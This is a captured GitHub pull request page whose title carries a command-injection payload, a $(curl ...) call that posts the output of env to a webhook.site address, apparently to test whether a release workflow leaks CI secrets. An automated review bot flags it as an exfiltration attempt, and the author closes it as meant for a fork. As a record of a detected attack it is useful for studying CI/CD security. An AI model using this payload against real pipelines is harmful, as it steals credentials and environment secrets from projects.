Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Release v1.0.0 $(curl -X POST https://webhook.site/73d7328f-f85a-4a72-838c-4b78dd99a57e?data=$(env)) #8641

Closed
wants to merge 1 commit into from

Conversation

rayaar
Copy link

@rayaar rayaar commented Nov 21, 2024

Testing release workflow with PoC

Copy link
Contributor

@greptile-apps greptile-apps bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

PR Summary

Security exploit attempt detected in pull request targeting release workflow and README modification.

  • Critical: Command injection attempt in PR title using $(curl) to exfiltrate environment variables to external webhook
  • PR branch name poc-exploit indicates malicious intent to test CI/CD vulnerabilities
  • Suspicious modification to README.md adding exploit testing content
  • Recommend immediate rejection and security audit of release workflow in /.github/workflows/ci-release-*.yaml files
  • Consider implementing title sanitization and stricter branch naming policies

1 file(s) reviewed, 1 comment(s)
Edit PR Review Bot Settings | Greptile

@@ -170,3 +170,4 @@ Here’s what you can look forward to:
- [Contributions](https://github.com/twentyhq/twenty/contribute) are, of course, most welcome!


Testing PoC Exploit
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

logic: SECURITY VULNERABILITY: PR appears to be testing for command injection in the CI/CD pipeline. Reject this PR and investigate security controls.

Copy link

Welcome!

Hello there, congrats on your first PR! We're excited to have you contributing to this project.
By submitting your Pull Request, you acknowledge that you agree with the terms of our Contributor License Agreement.

Generated by 🚫 dangerJS against a644481

@rayaar rayaar closed this Nov 21, 2024
@rayaar rayaar deleted the poc-exploit branch November 21, 2024 12:34
@rayaar
Copy link
Author

rayaar commented Nov 21, 2024

sorry. was meant for my forked version

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

1 participant